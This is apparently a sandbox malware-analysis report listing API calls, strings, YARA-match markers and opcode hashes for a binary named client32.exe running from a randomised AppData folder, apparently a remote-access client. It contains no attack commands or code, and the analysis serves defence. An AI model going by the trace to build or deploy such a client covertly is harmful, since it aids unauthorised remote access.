                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                                                                • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                                                                • API String ID: 1985783259-2296142801
                                                                                                                                                                • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                                                                                                • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                                                                                                • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                                                                                                • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
                                                                                                                                                                APIs
                                                                                                                                                                • _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                • wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • _memset.LIBCMT ref: 1110F477
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                                                                • API String ID: 3234921582-2664294811
                                                                                                                                                                • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                                                                                                • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                                                                                                • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                                                                                                • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,76968400), ref: 111450D0
                                                                                                                                                                  • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                                                                                  • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                                                                                                  • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                                                                                                • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                                                                                                • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 11031926
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                                                • String ID: %s%s.bin$562258$clientinv.cpp$m_pDoInv == NULL
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
                                                                                                                                                                • __strdup.LIBCMT ref: 111446A7
                                                                                                                                                                  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                                                                  • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
                                                                                                                                                                • _free.LIBCMT ref: 111446DC
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                                                                                • String ID:
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
                                                                                                                                                                  • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
                                                                                                                                                                • _free.LIBCMT ref: 1100EDB4
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • _free.LIBCMT ref: 1100EDC7
                                                                                                                                                                • _free.LIBCMT ref: 1100EDDA
                                                                                                                                                                • _free.LIBCMT ref: 1100EDED
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                                                                • String ID:
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                • wsprintfA.USER32 ref: 1114593E
                                                                                                                                                                • wsprintfA.USER32 ref: 11145954
                                                                                                                                                                  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,76968400,?), ref: 111432C7
                                                                                                                                                                  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                                                                                                  • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                                                                                • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                                                                                • API String ID: 3779116287-2600120591
                                                                                                                                                                • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                                                                                                • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                                                                                                • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                                                                                                • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,76968400,?), ref: 111432C7
                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile$CloseHandle
                                                                                                                                                                • String ID: "
                                                                                                                                                                • API String ID: 1443461169-123907689
                                                                                                                                                                • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                                                                                                • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                                                                                                • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                                                                                                • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,59FD48C0,75732EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                  • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                                                                                                • String ID: Client$DisableGeolocation
                                                                                                                                                                • API String ID: 3315423714-4166767992
                                                                                                                                                                • Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                                                                                                • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                                                                                                • Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                                                                                                • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                                                                                                APIs
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                                                                                                  • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                                                                                                  • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                                                                                                  • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                                                                                                  • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 110271F0
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                                                                                • String ID: Exit Msgloop, quit=%d
                                                                                                                                                                • API String ID: 3212272093-2210386016
                                                                                                                                                                • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                                                                                                • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                                                                                                • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                                                                                                • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110173FD
                                                                                                                                                                  • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(000002D8,000000FF), ref: 1101733C
                                                                                                                                                                  • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                                                                                                  • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                                                                                                  • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                                                                                                  • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(000002D8,000000FF), ref: 11017252
                                                                                                                                                                  • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                                                                                                  • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                                                                                                  • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                                                                                                • SetEvent.KERNEL32(000002D8), ref: 1101741D
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11017423
                                                                                                                                                                Strings
                                                                                                                                                                • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                                                                                                • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                                                                • API String ID: 3804766296-4122679463
                                                                                                                                                                • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                                                                                                • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
                                                                                                                                                                • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                                                                                                • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                                                                                • String ID: *AutoICFConfig$Client
                                                                                                                                                                • API String ID: 3257255551-59951473
                                                                                                                                                                • Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                                                                                                • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                                                                                                • Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                                                                                                • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 11070CB7
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 11070CC4
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 11070D96
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                                                                • String ID: Push
                                                                                                                                                                • API String ID: 1566154052-4278761818
                                                                                                                                                                • Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                                                                                                • Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
                                                                                                                                                                • Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                                                                                                • Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1314093303-0
                                                                                                                                                                • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                                                                                                • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                                                                                                • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                                                                                                • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\bpsFyf\client32.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CurrentFileModuleNameProcess
                                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe
                                                                                                                                                                • API String ID: 2251294070-2235949226
                                                                                                                                                                APIs
                                                                                                                                                                • _malloc.LIBCMT ref: 1110F4A9
                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                • _memset.LIBCMT ref: 1110F4D2
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp
                                                                                                                                                                • API String ID: 2803934178-2363596943
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateFileHandle
                                                                                                                                                                • String ID: \\.\NSWFPDrv
                                                                                                                                                                • API String ID: 3498533004-85019792
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _calloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1679841372-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                                                                                                • __wsplitpath.LIBCMT ref: 11111475
                                                                                                                                                                  • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1847508633-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                                                                                                  • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                                                                                                  • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                                                                                                  • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,013808B8,013808B8,013808B8,013808B8,013808B8,013808B8,013808B8,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                                                                                                  • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,013808B8,?,00000001,00000001), ref: 1109E9A3
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2256153495-0
                                                                                                                                                                • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                                                                                                • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                                                                                                • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                                                                                                • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
                                                                                                                                                                APIs
                                                                                                                                                                • InitializeCriticalSection.KERNEL32(111F0908,59FD48C0,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F0908,59FD48C0,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3991485460-0
